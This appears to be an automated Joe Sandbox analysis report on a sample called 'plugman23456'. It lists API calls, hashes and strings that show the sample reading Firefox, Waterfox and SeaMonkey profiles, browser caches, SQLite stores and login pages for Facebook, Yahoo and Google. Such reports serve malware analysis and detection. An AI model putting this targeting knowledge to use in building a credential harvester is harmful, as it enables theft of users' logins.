                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                          • String ID: strings
                          • API String ID: 3166385802-3030018805
                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                          • String ID: r!A
                          • API String ID: 2791114272-628097481
                          • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                          • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                          • _wcslwr.MSVCRT ref: 0040C817
                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                          • wcslen.MSVCRT ref: 0040C82C
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                          • API String ID: 62308376-4196376884
                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                          APIs
                          • memset.MSVCRT ref: 00403CBF
                          • memset.MSVCRT ref: 00403CD4
                          • memset.MSVCRT ref: 00403CE9
                          • memset.MSVCRT ref: 00403CFE
                          • memset.MSVCRT ref: 00403D13
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 00403DDA
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Waterfox$Waterfox\Profiles
                          • API String ID: 4039892925-11920434
                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                          APIs
                          • memset.MSVCRT ref: 00403E50
                          • memset.MSVCRT ref: 00403E65
                          • memset.MSVCRT ref: 00403E7A
                          • memset.MSVCRT ref: 00403E8F
                          • memset.MSVCRT ref: 00403EA4
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 00403F6B
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                          • API String ID: 4039892925-2068335096
                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                          APIs
                          • memset.MSVCRT ref: 00403FE1
                          • memset.MSVCRT ref: 00403FF6
                          • memset.MSVCRT ref: 0040400B
                          • memset.MSVCRT ref: 00404020
                          • memset.MSVCRT ref: 00404035
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 004040FC
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                          • API String ID: 4039892925-3369679110
                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                          • API String ID: 3510742995-2641926074
                          • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                          • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                          APIs
                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                          • memset.MSVCRT ref: 004033B7
                          • memcpy.MSVCRT ref: 004033D0
                          • wcscmp.MSVCRT ref: 004033FC
                          • _wcsicmp.MSVCRT ref: 00403439
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                          • String ID: $0.@
                          • API String ID: 3030842498-1896041820
                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 2941347001-0
                          • Opcode ID: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                          • Opcode Fuzzy Hash: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                          APIs
                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                          • String ID: advapi32.dll
                          • API String ID: 2012295524-4050573280
                          • Opcode ID: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                          • Opcode Fuzzy Hash: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                          APIs
                          • memset.MSVCRT ref: 00403C09
                          • memset.MSVCRT ref: 00403C1E
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                          • wcscat.MSVCRT ref: 00403C47
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                          • wcscat.MSVCRT ref: 00403C70
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                          • API String ID: 1534475566-1174173950
                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 669240632-0
                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                          APIs
                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                          • memset.MSVCRT ref: 00414C87
                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                          • wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                          • API String ID: 71295984-2036018995
                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                          APIs
                          • wcschr.MSVCRT ref: 00414458
                          • _snwprintf.MSVCRT ref: 0041447D
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                          • String ID: "%s"
                          • API String ID: 1343145685-3297466227
                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CCF
                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProcessTimes
                          • String ID: GetProcessTimes$kernel32.dll
                          • API String ID: 1714573020-3385500049
                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                          APIs
                          • memset.MSVCRT ref: 004087D6
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                          • memset.MSVCRT ref: 00408828
                          • memset.MSVCRT ref: 00408840
                          • memset.MSVCRT ref: 00408858
                          • memset.MSVCRT ref: 00408870
                          • memset.MSVCRT ref: 00408888
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                          • String ID:
                          • API String ID: 2911713577-0
                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID: @ $SQLite format 3
                          • API String ID: 1475443563-3708268960
                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmpqsort
                          • String ID: /nosort$/sort
                          • API String ID: 1579243037-1578091866
                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                          APIs
                          • memset.MSVCRT ref: 0040E60F
                          • memset.MSVCRT ref: 0040E629
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Strings
                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                          • API String ID: 2887208581-2114579845
                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
